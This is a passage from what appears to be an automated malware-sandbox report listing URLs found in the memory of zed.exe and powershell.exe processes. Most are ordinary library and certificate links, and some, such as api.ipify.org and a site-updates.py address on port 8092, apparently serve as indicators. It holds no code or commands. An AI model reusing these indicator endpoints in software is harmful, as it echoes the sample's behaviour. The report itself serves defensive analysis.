00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3016784415.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024919479.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736137366.00000132F85E0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3081633521.00000132F8472000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F9667000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3166041238.0000025B4B651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tango.freedesktop.org/Tango_Desktop_Project
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9F70000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9EA8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3081633521.00000132F8472000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: zed.exe, 0000000C.00000003.3087129020.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfb
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc1421.txt
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc1423.txt
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc5208.txt
Source: powershell.exe, 0000000A.00000002.3080499160.000002B0571AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.4876531934.000001EE2F4F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coK
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4761922586.00007FFDA3348000.00000008.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000000.00000002.4871936149.000001EE2F106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.VisualC
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F14C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.4741697049.000001EE178C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue44497.
Source: zed.exe, 0000000C.00000002.4762266975.00007FFDA34EC000.00000002.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by-sa/3.0/)
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
Source: zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: zed.exe, 0000000C.00000003.3074629659.00000132F7F1D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: zed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: zed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8483000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://flak.tedunangst.com/post/new-openssh-key-format-and-bcrypt-pbkdf
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: ChromeComboPack.exe	String found in binary or memory: https://github.com/mhammond/pywin32
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/openssl/openssl/blob/master/include/openssl/pem.h
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/platformdirs/platformdirs
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/issues/8996
Source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/issues/9253
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
Source: zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F96B3000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: zed.exe, 0000000C.00000002.4743750597.00000132F9AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_
Source: zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084052929.00000132F895F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3085033089.00000132F8907000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/All
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8A2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
